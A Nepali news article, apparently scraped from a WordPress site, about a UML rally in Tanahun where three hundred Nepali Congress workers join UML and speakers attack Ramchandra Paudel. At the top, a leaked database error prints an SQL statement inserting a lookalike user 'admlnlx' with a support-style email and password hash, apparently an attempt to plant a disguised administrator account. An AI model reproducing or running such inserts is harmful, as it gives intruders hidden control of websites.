WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5Aq7UML8QxuOyFNKhqbp1LUxs2EHb1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 13:04:40', '', 'admlnlx', 'admlnlx')
तनहुँ, माघ १६ –
सत्तारुढ दल नेपाली कांग्रेसका वरिष्ठ नेता रामचन्द्र पौडेलको क्षेत्र तनहुँ जिल्लामा प्रतिपक्षी नेकपा एमालेले कब्जा जमाएको छ ।
शनिबार एमाले क्षेत्र नम्बर २ ले आयोजना गरेको बृहत आमसभामा कांग्रेस नेतासहित तीन सय कार्यकर्ता एमालेमा प्रवेश गरेपछि पौडेलको क्षेत्रमा एमालेका पक्षमा जनलहर देखिएको हो । पार्टी प्रवेश गर्नेमा कांग्रेस अगुवा गिरबहादुर बिक, श्रीजन थापासहित तीन सय जना कांग्रेसी कार्यकर्ता रहेका छन् ।
क्षेत्र नम्बर २ स्थित तनहुँको दक्षिणी भेग शिवपुरमा आयोजित सभालाई सम्बोधन गर्न पुगेका एमाले युवा नेता महेश बस्नेत जनताको उपस्थित देखेर निकै हौसिए ।
झन् त्यसमा ३ सय जना काँग्रेसी कार्यकर्ता एमाले प्रवेश गरेपछि उनले भने-– ‘२४ बर्षदेखि रामचन्द्र पौडेलले जितेको यो क्षेत्र निकै विकसित होला भन्ने लागेको थियो । तर, राष्ट्रिय राजनीतिमा असफल नेता पौडेल तनहुँमा झन् असफल रहेछन् । यो क्षेत्रको विकास निर्माणको अबस्था देखेर मलाई दया लाग्यो,’ उनले भने– ‘अब रामचन्द्र पौडेलले राजनीतिबाट सन्यास लिएर धर्मकर्म गर्न देबघाटतिर लागे भो ।’

अघिल्लो निर्वाचनमा एमालेतर्फका उम्मेदवार एवं चर्चित व्यवसायी किसान श्रेष्ठले आफूले पहल गरेर बनेका सडक, बिद्युत लगायतको काममा काँग्रेसले बाधा हालेको आरोप लगाए ।
कार्यक्रममा एमाले बैकल्पिक केन्द्रीय सदस्य प्रतापलाल श्रेष्ठ, युबासंघ सचिब पर्शुराम बस्नेत, एमाले जिल्ला उपाध्यक्ष श्री प्रसाद श्रेष्ठ, कार्यालय सचिब राजेश्वर ढकालले राष्ट्रियता र समृद्धिको पक्षमा एमालेले खेलेको भूमिकाको चर्चा गरे ।
राष्ट्रिय लोकदोहोरी गायक कृष्ण राउले र गायिका फूलमाया केसीले गीत गाएर आमसभामा उपस्थित जनतालाई मनोरञ्जन दिएका थिए ।